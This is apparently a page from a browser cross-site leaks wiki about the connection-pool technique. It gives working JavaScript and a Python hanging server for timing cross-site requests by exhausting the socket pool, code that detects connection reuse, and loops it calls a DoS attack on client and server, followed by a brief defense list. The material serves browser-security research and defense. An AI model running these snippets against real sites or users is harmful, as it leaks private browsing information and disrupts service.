Connection Pool

Connection Pool

October 1, 2020

Another way to measure the network timing of a request consists of abusing the socket pool of a browser 1. Browsers use sockets to communicate with servers. As the operating system and the hardware it runs on have limited resources, browsers have to impose a limit. Run demo (Chrome) Run demo (Firefox)

To exploit the existence of this limit, attackers can:

  1. Check what the limit of the browser is, for example 256 global sockets for TCP and 6000 global sockets for UDP. 23
  2. Block \(255\) sockets for a long period of time by performing \(255\) requests to different hosts that simply hang the connection
// Client
for(let i=0; i<255; i++) fetch('https://'+i+'.example.com/', {mode: "no-cors", cache: "no-store"});
# Server
from http.server import BaseHTTPRequestHandler, HTTPServer
import time

class handler(BaseHTTPRequestHandler):
    def do_GET(self):
        time.sleep(float(100000))
        self.send_response(200)
        self.send_header('Cache-Control', 'no-store')
        self.end_headers()

with HTTPServer(('', 8000), handler) as server:
    server.serve_forever()
  1. Use the \(256^{th}\) socket by performing a request to the target page.
  2. Perform a \(257^{th}\) request to another host. Since all the sockets are being used (in steps 2 and 3), this request must wait until the pool receives an available socket. This waiting period provides the attacker with the network timing of the \(256^{th}\) socket, which belongs to the target page. This works because the \(255\) sockets in step 2 are still blocked, so if the pool received an available socket, it was caused by the release of the socket in step 3. The time to release the \(256^{th}\) socket is directly connected with the time taken to complete the request.
performance.clearResourceTimings();
await fetch(location.href, {cache: "no-store"});
await new Promise(r => setTimeout(r, 1000));
let data = performance.getEntries().pop();
let type = (data.connectStart === data.startTime) ? 'reused' : 'new';
console.log('Time spent: ' + data.duration + ' on ' + type + ' connection.');

Connection reuse #

With HTTP/1.1 (TCP) and HTTP/2 (TCP) and HTTP/3 (UDP) requests may reuse an existing connection for a host to improve performance. 45 HTTP/2 also has Connection Coalescing which allows different hostnames that are accessible from the same web server to reuse a connection. 6 This is currently keyed by if credentials are included in the request. Since a reused connection is normally faster this could allow for detecting if a site has connected to a host excluding anything that’s been cached and leaking information about the cross-site request by abusing Stream prioritization and HPACK compression. 7 Connections may get closed if they are left idle or the sockets are exhausted, for example 256 connections for HTTP/2 or 30 seconds idle for HTTP/3. 28 This may also leak when the connection happened and the browser can have per connection limits and on how many connections are allowed per host, for example 6 connections per host. 2

// Detect if a HTTP/3 request was made to a certain host in the last 20 seconds.
await new Promise(r => setTimeout(r, 10000));

// Check for connection reuse for when there’s a Timing-Allow-Origin header.
async function isConnected(url) {
    performance.clearResourceTimings();
    try {
        await fetch(url, {
            cache: "no-store",
            credentials: "include"
        });
    } catch {}
    await new Promise(r => setTimeout(r, 1000));
    let data = performance.getEntries().pop();
    // Allowed to read timing information.
    // Same-origin or the Timing-Allow-Origin header.
    console.log("Protocol: " + data.nextHopProtocol);
    return (data.connectStart === data.startTime);
}

// Check for connection reuse for when there’s no Timing-Allow-Origin header. (less reliable)
async function isConnected2(url, max = 50) {
    let start = performance.now();
    try {
        await fetch(url, {
            cache: "no-store",
            method: "GET",
            mode: "no-cors",
            credentials: "include"
        });
    } catch {}
    let duration = performance.now() - start;
    
    let start2 = performance.now();
    try {
        await fetch(url, {
            cache: "no-store",
            method: "GET",
            mode: "no-cors",
            credentials: "include"
        });
    } catch {}
    let duration2 = performance.now() - start2;
    return (duration - duration2 < max);
}

await isConnected2('https://example.com/404');

Skipping dependencies #

If a connection is exhausted or there’s to many sockets open then requests for code from a host may fail resulting in different behaviour. The following examples are by design a DoS attack for both the client and server. Open a lot of sockets: (ERR_CONNECTION_CLOSED, ERR_INSUFFICIENT_RESOURCES)

for (let i = 0; i < 500; i++) request();

async function request() {
    let x = new AbortController();
    fetch('https://example.org', {
        mode: "no-cors",
        //credentials: 'include',
        cache: "no-store",
        signal: x.signal
    });
    await new Promise(r => setTimeout(r, 10));
    x.abort();
    request();
}

open('https://example.com', '' , 'popup=1');

Overload a connection so it never requests to that host. (ERR_CONNECTION_RESET)

let x = [...Array(1000000)].join(',');
request();
function request() {
fetch('https://example.com', {mode: "no-cors", cache: "no-store", method: 'POST', body: x}).then(request);
}

Defense #

SameSite Cookies (Lax)COOPFraming ProtectionsIsolation Policies

info

Similar to partitioned caches, some browsers are considering to extend the principle of “split per site/origin” of resources to socket pools.

References #


  1. Leak cross-window request timing by exhausting connection pool, link ↩︎

  2. client_socket_pool_manager.cc, link ↩︎ ↩︎ ↩︎

  3. features.cc, link ↩︎

  4. rfc9113 Connection Reuse, link ↩︎

  5. rfc9114 Connection Reuse, link ↩︎

  6. HTTP/2 CONNECTION COALESCING, link ↩︎

  7. rfc9113 Remote Timing Attacks, link ↩︎

  8. quic_context.h, link ↩︎